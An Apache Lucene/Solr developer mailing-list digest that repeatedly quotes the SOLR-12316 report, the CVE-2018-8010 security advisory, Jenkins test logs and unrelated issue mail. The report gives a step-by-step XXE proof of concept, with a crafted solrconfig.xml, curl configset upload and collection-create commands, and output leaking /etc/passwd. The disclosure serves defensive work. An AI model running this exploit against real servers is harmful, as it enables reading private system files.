>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony

[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482426#comment-16482426
 ] 

ASF subversion and git services commented on SOLR-12316:


Commit f08c6b1ef149b4a7ca63c68c9fde3ccb14d39e6a in lucene-solr's branch 
refs/heads/branch_7x from [~thetaphi]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=f08c6b1 ]

SOLR-12316: Make CVE public

# Conflicts:
#   solr/CHANGES.txt


> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:

[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482425#comment-16482425
 ] 

ASF subversion and git services commented on SOLR-12316:


Commit 63e213916cd99490973c0473d1969bd5dcd7edd8 in lucene-solr's branch 
refs/heads/master from [~thetaphi]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=63e2139 ]

SOLR-12316: Make CVE public


> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
>  Daem

[SECURITY] CVE-2018-8010: XXE vulnerability due to Apache Solr configset upload

2018-05-21 Thread Uwe Schindler
CVE-2018-8010: XXE vulnerability due to Apache Solr configset upload

Severity: High

Vendor:
The Apache Software Foundation

Versions Affected:
Solr 6.0.0 to 6.6.3
Solr 7.0.0 to 7.3.0

Description:
The details of this vulnerability were reported internally by one of Apache
Solr's committers.
This vulnerability relates to an XML external entity expansion (XXE) in Solr
config files (solrconfig.xml, schema.xml, managed-schema). In addition,
Xinclude functionality provided in these config files is also affected in a
similar way. The vulnerability can be used as XXE using file/ftp/http
protocols in order to read arbitrary local files from the Solr server or the
internal network. See [1] for more details.

Mitigation:
Users are advised to upgrade to either Solr 6.6.4 or Solr 7.3.1 releases both
of which address the vulnerability. Once upgrade is complete, no other steps
are required. Those releases only allow external entities and Xincludes that
refer to local files / zookeeper resources below the Solr instance directory
(using Solr's ResourceLoader); usage of absolute URLs is denied. Keep in
mind, that external entities and XInclude are explicitly supported to better
structure config files in large installations. Before Solr 6 this was no
problem, as config files were not accessible through the APIs.

If users are unable to upgrade to Solr 6.6.4 or Solr 7.3.1 then they are
advised to make sure that Solr instances are only used locally without access
to public internet, so the vulnerability cannot be exploited. In addition,
reverse proxies should be guarded to not allow end users to reach the
configset APIs. Please refer to [2] on how to correctly secure Solr servers.

Solr 5.x and earlier are not affected by this vulnerability; those versions
do not allow to upload configsets via the API. Nevertheless, users should
upgrade those versions as soon as possible, because there may be other ways
to inject config files through file upload functionality of the old web
interface. Those versions are no longer maintained, so no deep analysis was
done.

Credit:
Ananthesh, Ishan Chattopadhyaya

References:
[1] https://issues.apache.org/jira/browse/SOLR-12316
[2] https://wiki.apache.org/solr/SolrSecurity

-
Uwe Schindler
uschind...@apache.org 
ASF Member, Apache Lucene PMC / Committer
Bremen, Germany
http://lucene.apache.org/



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-repro - Build # 672 - Still Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-repro/672/

[...truncated 28 lines...]
[repro] Jenkins log URL: 
https://builds.apache.org/job/Lucene-Solr-BadApples-Tests-master/60/consoleText

[repro] Revision: f506bc9cb7f1e82295c9c367487d49a80e767731

[repro] Repro line:  ant test  -Dtestcase=TestLargeCluster 
-Dtests.method=testSearchRate -Dtests.seed=9B07576659325420 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.badapples=true -Dtests.locale=hi 
-Dtests.timezone=Africa/Harare -Dtests.asserts=true -Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=TestLargeCluster 
-Dtests.method=testNodeLost -Dtests.seed=9B07576659325420 -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=hi 
-Dtests.timezone=Africa/Harare -Dtests.asserts=true -Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=SearchRateTriggerIntegrationTest 
-Dtests.method=testDeleteNode -Dtests.seed=9B07576659325420 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.badapples=true 
-Dtests.locale=es-MX -Dtests.timezone=Australia/Perth -Dtests.asserts=true 
-Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=TestAuthenticationFramework 
-Dtests.method=testBasics -Dtests.seed=9B07576659325420 -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=is -Dtests.timezone=ROK 
-Dtests.asserts=true -Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=IndexSizeTriggerTest 
-Dtests.method=testTrigger -Dtests.seed=9B07576659325420 -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=sr-Latn-ME 
-Dtests.timezone=Asia/Pontianak -Dtests.asserts=true -Dtests.file.encoding=UTF-8

[repro] git rev-parse --abbrev-ref HEAD
[repro] git rev-parse HEAD
[repro] Initial local git branch/revision: 
93926e9c83a9b4e9d52182654befae9d56191911
[repro] git fetch

[...truncated 2 lines...]
[repro] git checkout f506bc9cb7f1e82295c9c367487d49a80e767731

[...truncated 2 lines...]
[repro] git merge --ff-only

[...truncated 1 lines...]
[repro] ant clean

[...truncated 6 lines...]
[repro] Test suites by module:
[repro]solr/core
[repro]   IndexSizeTriggerTest
[repro]   TestLargeCluster
[repro]   TestAuthenticationFramework
[repro]   SearchRateTriggerIntegrationTest
[repro] ant compile-test

[...truncated 3298 lines...]
[repro] ant test-nocompile -Dtests.dups=5 -Dtests.maxfailures=20 
-Dtests.class="*.IndexSizeTriggerTest|*.TestLargeCluster|*.TestAuthenticationFramework|*.SearchRateTriggerIntegrationTest"
 -Dtests.showOutput=onerror  -Dtests.seed=9B07576659325420 -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=sr-Latn-ME 
-Dtests.timezone=Asia/Pontianak -Dtests.asserts=true -Dtests.file.encoding=UTF-8

[...truncated 18056 lines...]
[repro] Setting last failure code to 256

[repro] Failures:
[repro]   0/5 failed: org.apache.solr.cloud.TestAuthenticationFramework
[repro]   0/5 failed: org.apache.solr.cloud.autoscaling.sim.TestLargeCluster
[repro]   2/5 failed: org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest
[repro]   3/5 failed: 
org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest
[repro] git checkout 93926e9c83a9b4e9d52182654befae9d56191911

[...truncated 2 lines...]
[repro] Exiting with code 256

[...truncated 5 lines...]

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-12316:
-
Security: Public  (was: Private (Security Issue))

> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
>  Daemon:/var/lib/rpcbind:/sbin/nologin\nusbmuxd:x:113:113:usbmuxd 
> user:/:/sbin/nologin\nradvd:x:75:75:radvd 
> user:/:/sbin/nologin\nqemu:x:107:107:qemu 
> user:/:/sbin/nologin\napache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin\ncolord:x:995:990:Use

[jira] [Updated] (SOLR-11774) langid.map.individual won't work with langid.map.keepOrig

2018-05-21 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-11774?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-11774:
-
Fix Version/s: (was: 6.6.4)

> langid.map.individual won't work with langid.map.keepOrig
> -
>
> Key: SOLR-11774
> URL: https://issues.apache.org/jira/browse/SOLR-11774
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: contrib - LangId
>Affects Versions: 5.0
>Reporter: Marco Remy
>Assignee: Jan Høydahl
>Priority: Minor
> Fix For: 7.4, master (8.0)
>
>  Time Spent: 10m
>  Remaining Estimate: 0h
>
> Tried to get language detection to work.
> *Setting:*
> {code:xml}
>  class="org.apache.solr.update.processor.LangDetectLanguageIdentifierUpdateProcessorFactory">
>   title,author
>   detected_languages
>   de,en
>   txt
>   true
>   true
>   true
> 
> {code}
> Main purpose
> * Map fields individually
> * Keep the original field
> But the fields won't be mapped individually. They are mapped to a single 
> detected language. After some hours of investigation i finally found the 
> reason: *The option langid.map.keepOrig breaks the individual mapping 
> function.* Only if it is disabled the fields will be mapped as expected.
> - Regards



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[More Like This] I would like to contribute

2018-05-21 Thread Alessandro Benedetti
Hi gents,
I have spent some time in the last year or so working on the Lucene More
Like This ( and related Solr components ) .

Initially I just wanted to improve it, adding BM25[1] but then I noted a
lot of areas of possible improvements.

I started then with a refactor of the functionality with these objectives
in mind :

1) make the MLT more readable
2) make the MLT more modular and easy to extend
3) make the MLT more tested

*This is just a start, I want to invest significant time with my company to
work on the functionality and contribute it back.*

I split my effort in small Pull Requests to make it easy a review and
possible contribution.

Unfortunately I didn't get much feedback so far.
The More Like This functionality seems mostly abandoned.
I tried also to contact one of the last committers that apparently got
involved in the developments ( Mark Harwood mharw...@apache.org ), but I
had no luck.

This is the current Jira Issue that start with a first small refactor +
tests :

https://issues.apache.org/jira/browse/SOLR-12299

I would love to contribute it and much more, but I need some feedback and
review ( unfortunately I am not a committer yet).

Let me know what can I do to speed up the process from my side.

Regards

[1] https://issues.apache.org/jira/browse/LUCENE-7498

--
Alessandro Benedetti
Search Consultant, R&D Software Engineer, Director
www.sease.io


[JENKINS] Lucene-Solr-7.x-Windows (64bit/jdk-10.0.1) - Build # 604 - Still Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-7.x-Windows/604/
Java: 64bit/jdk-10.0.1 -XX:-UseCompressedOops -XX:+UseG1GC

2 tests failed.
FAILED:  org.apache.solr.common.util.TestTimeSource.testEpochTime

Error Message:
SimTimeSource:50.0 time diff=10315000

Stack Trace:
java.lang.AssertionError: SimTimeSource:50.0 time diff=10315000
at 
__randomizedtesting.SeedInfo.seed([9D147D2F8E182684:A5780E0A1AC884C2]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at 
org.apache.solr.common.util.TestTimeSource.doTestEpochTime(TestTimeSource.java:48)
at 
org.apache.solr.common.util.TestTimeSource.testEpochTime(TestTimeSource.java:32)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
